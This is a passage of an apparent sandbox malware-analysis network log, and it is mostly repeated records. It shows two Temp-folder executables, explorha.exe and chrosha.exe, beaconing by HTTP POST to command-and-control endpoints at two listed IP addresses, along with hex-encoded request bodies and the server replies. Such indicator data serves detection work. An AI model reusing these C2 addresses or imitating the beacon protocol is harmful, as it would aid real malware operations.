                                                                                                                                                                                                                                      458 | 192.168.2.5 | 50302 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.228532076 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.475997925 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      459 | 192.168.2.5 | 50303 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.463726044 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.711889029 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      460 | 192.168.2.5 | 50304 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.731981039 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.986743927 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      461 | 192.168.2.5 | 50305 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.073044062 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.322376013 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      462 | 192.168.2.5 | 50306 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.350641966 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.596870899 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      463 | 192.168.2.5 | 50307 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.574487925 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.828105927 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
464 | 192.168.2.5 | 50308 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:06.851327896 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:07.103713036 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
465 | 192.168.2.5 | 50309 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:07.198774099 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:07.447228909 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
466 | 192.168.2.5 | 50310 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:07.463725090 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:07.712004900 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
467 | 192.168.2.5 | 50311 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:07.695970058 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:07.941240072 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
468 | 192.168.2.5 | 50312 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:07.957818031 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:08.204591036 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
469 | 192.168.2.5 | 50313 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:08.306380987 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:08.554958105 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
470 | 192.168.2.5 | 50314 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:08.572854996 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:08.820569038 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
471 | 192.168.2.5 | 50315 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:08.802396059 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:09.051578999 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
472 | 192.168.2.5 | 50316 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:09.072012901 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:09.323909044 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
473 | 192.168.2.5 | 50317 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:09.417165041 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:09.665031910 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
474 | 192.168.2.5 | 50318 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:09.679480076 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:09.923858881 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
